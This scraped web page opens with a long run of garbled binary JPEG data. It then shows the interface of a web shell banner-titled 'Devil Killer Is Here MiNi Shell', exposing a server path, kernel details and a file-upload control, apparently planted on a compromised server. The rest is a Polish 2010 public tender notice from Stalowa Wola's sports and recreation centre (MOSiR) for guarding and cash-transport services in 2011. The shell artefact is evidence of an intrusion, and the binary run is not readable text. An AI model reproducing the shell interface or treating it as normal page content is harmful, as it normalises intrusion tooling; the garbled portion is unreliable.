JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101125/383094-N-2010.html

<p class="kh_header"><b>Stalowa Wola: WYKONANIE USŁUG OCHRONIARSKICH na obiektach MOSiR w 2011r.</b><br>
<b>Numer ogłoszenia: 383094 - 2010; data zamieszczenia: 25.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji , ul. Hutnicza 15, 37-450 Stalowa Wola, woj. podkarpackie, tel. 015 8422562, 8447338, faks 015 8422562, 8447338.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mosir.stalowawola.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE USŁUG OCHRONIARSKICH na obiektach MOSiR w 2011r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zadanie obejmuje usługi ochroniarskie w 2011r.:1.1 Fizyczna ochrona obiektów - pływalnia kryta i odkryta  MOSiR oraz stadion piłkarski MOSiR przy ulicy Hutniczej 15 w Stalowej Woli w 2011r. - przy następujących założeniach: pływalnia odkryta - ochrona codzienna w dniach pracy basenów, 3 pracowników ochrony         fizycznej, w okresie 25.06.2011 - 31.08.2011, w godzinach 10:00 - 18:30,
pływalnia kryta - ochrona codzienna w dniach pracy basenów, 1 pracownik ochrony fizycznej, w okresach 02.01.2011 - 12.06.2011 i 04.07.2011 - 23.12.2011,
w dniach od poniedziałku do piątku w godzinach 18:30 - 23:00 z wyjątkiem okresów: 01.05.2011 w godzinach 15:00 - 23:00, 03.05.2011 w godzinach 10:00 - 23:00, 11.11.2011 w godzinach 10:00 - 23:00 oraz 04.07.2011 - 31.08.2011 w godzinach 10:00 - 23:00 w soboty i niedziele w godzinach 12:00 - 23:00,
stadion piłkarski - ochrona codzienna, 1 pracownik ochrony fizycznej,                    w okresie 04.05.2011 - 31.10.2011, w godzinach 18:00 - 22:00,
Dni, w których baseny będą nieczynne w 2010r.:01.01.2011     sobota             26.12.2011    poniedziałek
23.04.2011     sobota                        27.12.2011    wtorek   
24.04.2011     niedziela                    28.12.2011    środa
25.04.2011     poniedziałek              29.12.2011    czwartek
01.11.2011     wtorek                       30.12.2011    piątek 
24.12.2011     sobota                        31.12.2011    sobota
25.12.2011     niedziela                        
Planowane okresy pracy basenów w 2011r.:
02.01.2011 - 12.06.2011   baseny kryte
25.06.2011 - 31.08.2011   baseny odkryte
04.07.2011 - 09.09.2011   baseny kryte (bez basenu głębokiego)
10.09.2011 - 23.12.2011   baseny kryte
a/ Szacunkowe zapotrzebowanie ilości godzin pracy pracowników ochrony w okresie realizacji umowy( w dniach od 02.01.2011r. do 31.12.2011r.)  wynosi - 5.293,5 h. b/ Ilość godzin pracy określona w ppkt a/ jest ilością szacunkową i jako taka nie może stanowić podstawy do wnoszenia przez Wykonawcę jakichkolwiek roszczeń co do ilości godzin faktycznie zleconych przez Zamawiającego w toku realizacji umowy w sprawie zamówienia publicznego, c/ Zamawiający zastrzega sobie prawo ograniczenia przedmiotu zamówienia w zakresie ilościowym, w przypadku gdy z powodów ekonomicznych, bieżących lub innych potrzeb, 
nie będzie to leżało w interesie Zamawiającego, d/ W związku z ograniczeniem przez Zamawiającego przedmiotu zamówienia, Wykonawcy nie będą przysługiwały żadne roszczenia w stosunku do Zamawiającego, e/ Rozliczanie w toku realizacji umowy w sprawie zamówienia publicznego następować będzie sukcesywnie w oparciu o faktycznie zrealizowaną ilość godzin ochrony i cenę jednostkową zadeklarowaną w ofercie, f/ Wykonawca będzie odpowiadał za wszelkie szkody wyrządzone Zamawiającemu przez personel Wykonawcy oraz osoby trzecie, jeżeli szkoda powstała na skutek nienależytego wykonywania usługi ochrony.
1.2 Ochrona i transport wartości pieniężnych i innych walorów (czeki, weksle itp.) przy użyciu własnych środków transportu Wykonawcy w zakresie pobrania od Zamawiającego w Stalowej Woli przy ul. Hutniczej 15 - z kas basenowych i głównej kasy MOSiR-u do kasy wrzutowej Banku Spółdzielczego w Stalowej Woli przy ul. Okulickiego 56C, zamkniętych i zabezpieczonych pakietów (bez kasjera) wg wskazań Zamawiającego w 2011r. (w okresie od 02.01.2011 do 31.12.2011).
a/  przyjmowanie pakietów będzie dokonywane przez pracowników Wykonawcy  
posiadających pisemne upoważnienie uprawniające ich do pobrania i wykonania 
transportu wartości pieniężnych. Upoważnienia te ważne są wraz z dowodem osobistym. b/ wymienione upoważnienia wydawane będą przez Kierownictwo Wykonawcy. c/  w przypadku zamiany pracownika pobierającego pakiety Wykonawca jest zobowiązany przed rozpoczęciem usługi powiadomić o tym fakcie upoważnionego pracownika Zamawiającego, podając do wiadomości jego dane personalne. d/  szacunkowe zapotrzebowanie ilości konwojów w okresie realizacji umowy wynosi - maksimum 180 konwojów, wyliczone w następujący sposób:
7 razy w m-cu to daje 84 konwojów w roku (Zamawiający przyjmuje jako pewnik),
+  8 razy w m-cu to daje   96 konwojów w roku (Zamawiający przyjmuje je warunkowo jako uzupełnienie części pewnej, uzależnione od bieżących potrzeb),
e/ ilość konwojów określona w ppkt d/  jest ilością szacunkową i jako taka nie może stanowić podstawy do wnoszenia przez Wykonawcę jakichkolwiek roszczeń co do ilości konwojów faktycznie zleconych przez Zamawiającego w toku realizacji umowy w sprawie zamówienia publicznego, f/ Zamawiający zastrzega sobie prawo ograniczenia przedmiotu zamówienia w zakresie ilościowym, w przypadku gdy z powodów ekonomicznych, bieżących potrzeb lub innych, nie będzie to leżało w interesie Zamawiającego, g/ w związku z ograniczeniem przez Zamawiającego przedmiotu zamówienia, Wykonawcy nie będą przysługiwały żadne roszczenia w stosunku do Zamawiającego, h/  rozliczanie w toku realizacji umowy w sprawie zamówienia publicznego następować będzie sukcesywnie w oparciu o faktycznie zrealizowaną ilość konwojów i cenę jednostkową zadeklarowaną w ofercie,
i/ Wykonawca będzie odpowiadał za wszelkie szkody wyrządzone Zamawiającemu przez personel Wykonawcy oraz osoby trzecie, jeżeli szkoda powstała na skutek nienależytego wykonywania usługi ochrony.
2. Zakres obowiązków w zakresie ochrony :
2.1  Ochrona fizyczna obiektów.      2.1.1 pływalnia odkryta:
a/  prowadzenie zeszytu służby - przechowywany w portierni MOSiR w budynku administracyjnym: (32-wu kartkowy zeszyt w kratkę, z ponumerowanymi stronami, pieczęć firmowa na każdej stronie i na okładce, każda strona to jeden dzień miesiąca, na zakończenie każdego m-ca na jednej stronie podsumowanie pokazujące ile godzin przepracowano w każdym dniu miesiąca i ile to jest godzin łącznie, potwierdzone przez Koordynatora; do której personel Wykonawcy wpisywać będzie: datę, kto pełnił dyżur, wszelkie spostrzeżenia, uwagi oraz istotne wydarzenia związane ze sprawowaniem ochrony obiektów i mienia Zamawiającego; co najmniej 1-krotna kontrola w ciągu tygodnia  przez Koordynatora z wpisem o tym do zeszytu służby; po 31.08.2011r. przekazać zeszyt służby Zamawiającemu z fakturą za sierpień), b/   zapewnienie wszystkim osobom wykonującym pracę wynikającą z niniejszego zamówienia odpowiednich, jednolitych ubrań służbowych, identyfikatorów ze zdjęciem oraz zapewnienie łączności telefonicznej lub radiowej z własnym dyspozytorem, grupą interwencyjną, Koordynatorem, itp., c/   utrzymanie porządku i czystości na stanowiskach służby, dbałość o estetyczny wygląd zewnętrzny, d/   znajomość regulaminu obiektu i regulaminu korzystania z urządzeń znajdujących się na terenie pływalni odkrytej, e/   prowadzenie stałej i wnikliwej obserwacji otoczenia, a zwłaszcza ogrodzeń, f/   zapobieganie nielegalnym wtargnięciom na teren pływalni odkrytej, g/   nie wpuszczanie na teren pływalni odkrytej osób w stanie wskazującym na spożycie alkoholu lub innych środków odurzających oraz usiłujących wnieść przedmioty niebezpieczne lub zabronione,
h/   wyprowadzanie z terenu pływalni odkrytej osób w stanie wskazującym na spożycie alkoholu lub innych środków odurzających oraz posiadających przedmioty niebezpieczne lub zabronione, i/   udzielanie pomocy pracownikom MOSiR ( a w szczególności ratownikom, portierom oraz obsługującym punkty usługowe na terenie pływalni odkrytej ) na ich wezwanie lub mającym problemy z agresywnymi lub niepłacącymi klientami, j/   zgłaszanie Zamawiającemu wszelkie zauważone szkody lub nieprawidłowości  zagrażające życiu lub zdrowiu w miejscu wykonywania pracy, k/    natychmiastowe interweniowanie w przypadku stwierdzenia naruszenia przepisów porządkowych oraz przepisów ochrony ppoż, l/   w razie pożaru lub innego miejscowego zagrożenia natychmiastowe wyprowadzenie osób znajdujących się w strefach ich zasięgu, wezwanie Straży Pożarnej lub innych służb ratowniczych oraz powiadomienie upoważnionego przedstawiciela Zamawiającego,  po czym do czasu przybycia wezwanych służb przystąpienie do likwidacji tych zagrożeń w miarę posiadanych środków, m/    podejmowanie interwencji w przypadku zaistnienia zagrożenia bezpieczeństwa, naruszenia porządku lub ujawnienia przestępstwa, n/  z chwilą zaistnienia przestępstwa, naruszenia nietykalności bądź uzyskania informacji o podłożeniu ładunku wybuchowego, zachowanie maksymalnej ostrożności, zapewnienie sobie pomocy innych pracowników, ustalenie świadków, zabezpieczenie śladów i dowodów przestępstwa, niezwłocznie powiadomienie przełożonych oraz upoważnionego przedstawiciela Zamawiającego, o/   przed zamknięciem pływalni odkrytej sprawdzenie czy wszyscy użytkownicy opuścili teren pływalni (fakt ten należy odnotować w zeszycie służby),
p/   wykonywanie innych czynności zleconych przez Zamawiającego, a mieszczących się w szeroko rozumianym zakresie usługi ochrony,
r/   wykonywanie wszystkich czynności objętych niniejszym zamówieniem własnymi środkami i własnym sprzętem, s/    wyznaczenie Koordynatora, zobowiązanego do przeprowadzenia kontroli pracowników  ochrony na terenie pływalni odkrytej między godzinami 10:00 a 18:30, co najmniej raz   w tygodniu (fakt kontroli musi być poświadczony stosownym w swej treści wpisem w zeszycie służby prowadzonej przez pracowników ochrony), potwierdzenia ilości przepracowanej ilości godzin na koniec miesiąca oraz przygotowania protokołu odbioru usług ochroniarskich po każdym miesiącu - zgodnie z wzorem stanowiącym załącznik nr 15 do niniejszej SIWZ.
2.1.2 pływalnia kryta: a/   prowadzenie zeszytu służby - przechowywany w pomieszczeniu służbowym w holu pływalni krytej: (część I  to 100-tu kartkowy zeszyt w kratkę dla rejestrowania zdarzeń w I-szym półroczu, część II to 100-tu kartkowy zeszyt w kratkę dla rejestrowania zdarzeń w II-gim półroczu, z ponumerowanymi stronami, pieczęć firmowa na każdej stronie, każda strona to jeden dzień miesiąca, na zakończenie każdego m-ca na jednej stronie podsumowanie pokazujące ile godzin przepracowano w każdym dniu miesiąca i ile to jest godzin łącznie, potwierdzone przez Koordynatora ; do której personel Wykonawcy wpisywać będzie: datę, kto pełnił dyżur, wszelkie spostrzeżenia, uwagi oraz istotne wydarzenia związane ze sprawowaniem ochrony obiektów i mienia Zamawiającego; co najmniej 1-krotna kontrola w ciągu tygodnia przez Koordynatora z wpisem o tym do zeszytu służby; po wypełnieniu I-szej części zeszytu służby należy ją przekazać Zamawiającemu z fakturą za czerwiec, po wypełnieniu II-giej części zeszytu służby należy ją przekazać Zamawiającemu z fakturą za grudzień), b/   zapewnienie wszystkim osobom wykonującym pracę wynikającą z niniejszego zamówienia odpowiednich, jednolitych ubrań służbowych, identyfikatorów ze zdjęciem oraz zapewnienie łączności telefonicznej lub radiowej z własnym dyspozytorem, grupą interwencyjną, Koordynatorem, itp., c/   utrzymanie porządku i czystości na stanowiskach służby, dbałość o estetyczny wygląd zewnętrzny, d/   znajomość regulaminu obiektu i regulaminu korzystania z urządzeń znajdujących się na terenie pływalni krytej, e/   na rozpoczęcie służby sprawdzenie działania systemu monitoringu na terenie pływalni krytej (rejestrator wraz z monitorem znajduje się w pomieszczeniu służbowym w holu pływalni krytej),
f/   dbanie o czystość i porządek w pomieszczeniu służbowym, g/   prowadzenie stałej i wnikliwej obserwacji otoczenia, h/   zapobieganie nielegalnym wtargnięciom na teren pływalni krytej, i/    nie wpuszczanie na teren pływalni krytej osób w stanie wskazującym na spożycie alkoholu lub innych środków odurzających oraz usiłujących wnieść przedmioty niebezpieczne lub zabronione, j/    wyprowadzanie z terenu pływalni krytej osób w stanie wskazującym na spożycie alkoholu lub innych środków odurzających oraz posiadających przedmioty niebezpieczne                   lub zabronione, k/   udzielanie pomocy pracownikom MOSiR ( a w szczególności ratownikom, kasjerkom lub szatniarkom na terenie pływalni  krytej ) na ich wezwanie lub mającym problemy z agresywnymi lub niepłacącymi klientami (problem będzie rozwiązany poprzez zapłatę przez klienta  lub spisanie jego danych przez wezwany patrol Policji), l/   zgłaszanie Zamawiającemu wszelkie zauważone szkody lub nieprawidłowości  zagrażające życiu lub zdrowiu w miejscu wykonywania pracy,
m/  natychmiastowe interweniowanie w przypadku stwierdzenia naruszenia przepisów porządkowych oraz przepisów ochrony ppoż, n/   w razie pożaru lub innego miejscowego zagrożenia natychmiastowe wyprowadzenie osób znajdujących się w strefach ich zasięgu, wezwanie Straży Pożarnej lub innych służb ratowniczych oraz powiadomienie upoważnionego przedstawiciela Zamawiającego,  po czym do czasu przybycia wezwanych służb przystąpienie do likwidacji tych zagrożeń w miarę posiadanych środków, o/   podejmowanie interwencji w przypadku zaistnienia zagrożenia bezpieczeństwa, naruszenia porządku lub ujawnienia przestępstwa, p/   z chwila zaistnienia przestępstwa, naruszenia nietykalności bądź uzyskania informacji o podłożeniu ładunku wybuchowego, zachowanie maksymalnej ostrożności, zapewnienie sobie pomocy innych pracowników, ustalenie świadków, zabezpieczenie śladów i dowodów przestępstwa, niezwłocznie powiadomienie przełożonych oraz upoważnionego przedstawiciela Zamawiającego, r/   w dniach od poniedziałku do piątku ok. godziny 19:00 kierowanie ruchem klientów pływalni krytej w okolicy bramki wejściowej na pływalnię oraz zwracanie uwagi na zmianę obuwia przez klientów pływalni,
s/   przed zamknięciem pływalni krytej i opuszczeniem pomieszczenia służbowego sprawdzenie czy wszyscy użytkownicy opuścili teren pływalni, czy działa system monitoringu (ewentualną usterkę monitoringu należy zgłosić kasjerce w kasie basenów krytych), stan wyposażenia pomieszczenia służbowego (fakt ten należy odnotować w zeszycie służby), t/    wykonywanie innych czynności zleconych przez Zamawiającego, a mieszczących się w szeroko rozumianym zakresie usługi ochrony, u/   wykonywanie wszystkich czynności objętych niniejszym zamówieniem własnymi środkami i własnym sprzętem, w/  wyznaczenie Koordynatora, zobowiązanego do przeprowadzenia kontroli pracowników  ochrony na terenie pływalni krytej między godzinami 18:30 a 23:00 w dniach od poniedziałku do piątku i w soboty oraz niedziele między godzinami 12:00 a 23:00, co najmniej raz w tygodniu (fakt kontroli musi być poświadczony stosownym w swej treści wpisem w książce dyżurów prowadzonej przez pracowników ochrony) potwierdzenia ilości przepracowanej ilości godzin na koniec miesiąca oraz przygotowania protokołu odbioru usług ochroniarskich po każdym miesiącu - zgodnie z wzorem stanowiącym załącznik nr 15 do niniejszej SIWZ .
2.1.3 stadion piłkarski MOSiR w Stalowej Woli przy ulicy Hutniczej: a/  prowadzenie zeszytu służby - przechowywany w portierni w budynku pawilonu sportowego MOSiR: (100-tu kartkowy zeszyt w kratkę, z ponumerowanymi stronami, pieczęć firmowa na każdej stronie i na okładce, każda strona to jeden dzień miesiąca, na zakończenie każdego m-ca na jednej stronie podsumowanie pokazujące ile godzin przepracowano w każdym dniu miesiąca i ile to jest godzin łącznie, potwierdzone przez Koordynatora; do której personel Wykonawcy wpisywać będzie: datę, kto pełnił dyżur, wszelkie spostrzeżenia, uwagi oraz istotne wydarzenia związane ze sprawowaniem ochrony obiektów i mienia Zamawiającego; co najmniej 1-krotna kontrola w ciągu tygodnia  przez Koordynatora z wpisem o tym do zeszytu służby;  po 31.10.2011r. przekazać zeszyt służby Zamawiającemu z fakturą za październik),
b/   zapewnienie wszystkim osobom wykonującym pracę wynikającą z niniejszego zamówienia odpowiednich, jednolitych ubrań służbowych, identyfikatorów ze zdjęciem oraz zapewnienie łączności telefonicznej lub radiowej z własnym dyspozytorem, grupą interwencyjną, Koordynatorem, itp., c/   utrzymanie porządku i czystości na stanowiskach służby, dbałość o estetyczny wygląd zewnętrzny,
d/   znajomość regulaminu obiektu i regulaminu korzystania z urządzeń znajdujących się na terenie stadionu MOSiR przy ulicy Hutniczej 15 w Stalowej Woli,
e/   prowadzenie stałej i wnikliwej obserwacji otoczenia, a zwłaszcza ogrodzeń, 
f/   zwracanie uwagi na korzystanie z urządzeń sportowych (bieżnie, boiska, rzutnie), czy osoby korzystające z w/w urządzeń znajdują się pod opieka trenera, instruktora, nauczyciela W-Fu, reagowanie na samowolne korzystanie z w/w urządzeń, g/    reagowanie na próby samowolnego przestawiania urządzeń sportowych, np. bramek piłkarskich, h/   przed zamknięciem bram stadionowych ok. godziny 20:00 sprawdzenie czy wszyscy użytkownicy opuścili teren stadionu (fakt ten należy odnotować w zeszycie służby), i/   nie wpuszczanie na teren stadionu osób w stanie wskazującym na spożycie alkoholu lub innych środków odurzających oraz usiłujących wnieść przedmioty niebezpieczne lub zabronione, j/   zapobieganie nielegalnym wtargnięciom na teren stadionu, piciu alkoholu i paleniu ognisk,
k/   wyprowadzanie z terenu stadionu osób w stanie wskazującym na spożycie alkoholu lub innych środków odurzających oraz posiadających przedmioty niebezpieczne lub zabronione, l/   udzielanie pomocy pracownikom MOSiR obsługującym punkty usługowe na terenie stadionu na ich wezwanie lub mającym problemy z agresywnymi lub niepłacącymi klientami, m/   zgłaszanie Zamawiającemu wszelkie zauważone szkody lub nieprawidłowości  zagrażające życiu lub zdrowiu w miejscu wykonywania pracy, n/  natychmiastowe interweniowanie w przypadku stwierdzenia naruszenia przepisów porządkowych oraz przepisów ochrony ppoż,
o/   w razie pożaru lub innego miejscowego zagrożenia natychmiastowe wyprowadzenie osób znajdujących się w strefach ich zasięgu, wezwanie Straży Pożarnej lub innych służb ratowniczych oraz powiadomienie upoważnionego przedstawiciela Zamawiającego, po czym do czasu przybycia wezwanych służb przystąpienie do likwidacji tych zagrożeń w miarę posiadanych środków,
p/    podejmowanie interwencji w przypadku zaistnienia zagrożenia bezpieczeństwa, naruszenia porządku lub ujawnienia przestępstwa,
r/   z chwilą zaistnienia przestępstwa, naruszenia nietykalności bądź uzyskania informacji o podłożeniu ładunku wybuchowego, zachowanie maksymalnej ostrożności, zapewnienie sobie pomocy innych pracowników, ustalenie świadków, zabezpieczenie śladów i dowodów przestępstwa, niezwłocznie powiadomienie przełożonych oraz upoważnionego przedstawiciela Zamawiającego,  s/   wykonywanie innych czynności zleconych przez Zamawiającego, a mieszczących się w szeroko rozumianym zakresie usługi ochrony, t/   wykonywanie wszystkich czynności objętych niniejszym zamówieniem własnymi środkami i własnym sprzętem,
u/    wyznaczenie Koordynatora, zobowiązanego do przeprowadzenia kontroli pracowników  ochrony na terenie stadionu między godzinami 18:00 a 22:00, co najmniej raz w tygodniu (fakt kontroli musi być poświadczony stosownym w swej treści wpisem w zeszycie służby prowadzonej przez pracowników ochrony), potwierdzenia ilości przepracowanej ilości godzin na koniec miesiąca oraz przygotowania protokołu odbioru usług ochroniarskich po każdym miesiącu - zgodnie z wzorem stanowiącym załącznik nr 15 do niniejszej SIWZ.
2.2  Ochrona i transport wartości pieniężnych i innych walorów:  
 a/   każdorazowo potwierdzenie w rejestrze Zamawiającego przejęcia pakietu przygotowanego przez Zamawiającego, bez sprawdzania ich zawartości,
b/   transport i ochrona wartości pieniężnych przy użyciu własnych środków i własnego sprzętu, na trasie kasa/MOSiR w Stalowej Woli przy ulicy Hutniczej 15 do wrzutni w Banku Spółdzielczym w Stalowej Woli przy ulicy Okulickiego 56C,
c/   zapewnienie wszystkim osobom wykonującym pracę wynikającą z niniejszego zamówienia odpowiednich, jednolitych, zaakceptowanych przez Zamawiającego ubrań służbowych, identyfikatorów ze zdjęciem oraz sprzętu do komunikowania się z odpowiednimi służbami, między sobą oraz z Zamawiającym (np. krótkofalówki).
d/   wyznaczenie Koordynatora, zobowiązanego do przeprowadzenia kontroli pracowników  ochrony  oraz przygotowania protokołu odbioru usług ochroniarskich po każdym miesiącu - zgodnie z wzorem stanowiącym załącznik nr 16 do niniejszej SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 6 i 7  lub art. 134 ust. 6 pkt 3 USTAWY, w ilości do 25% zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków na zasadzie spełnia / nie spełnia,
na podstawie oświadczeń i dokumentów załączonych w ofercie.
Warunek będzie spełniony poprzez złożenie aktualnej koncesji  Ministra Spraw 
Wewnętrznych i Administracji na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia, ważne co najmniej do końca 2011r. i pozwalające na działalność co najmniej na terenie Stalowej Woli.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków na zasadzie spełnia / nie spełnia,
na podstawie oświadczeń i dokumentów załączonych w ofercie.
Warunek będzie spełniony jeżeli Wykonawca wykaże, iż w ciągu ostatnich 3-ch lat 
przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum 2 usługi ochrony osób i mienia, które sprawował w sposób ciągły przez okres minimum 6 m-cy każda - odrębna umowa lub zlecenie oraz załączył dokumenty potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków na zasadzie spełnia / nie spełnia,
na podstawie oświadczeń i dokumentów załączonych w ofercie.
Warunek będzie spełniony jeżeli Wykonawca wykaże, iż do wykonywania czynności 
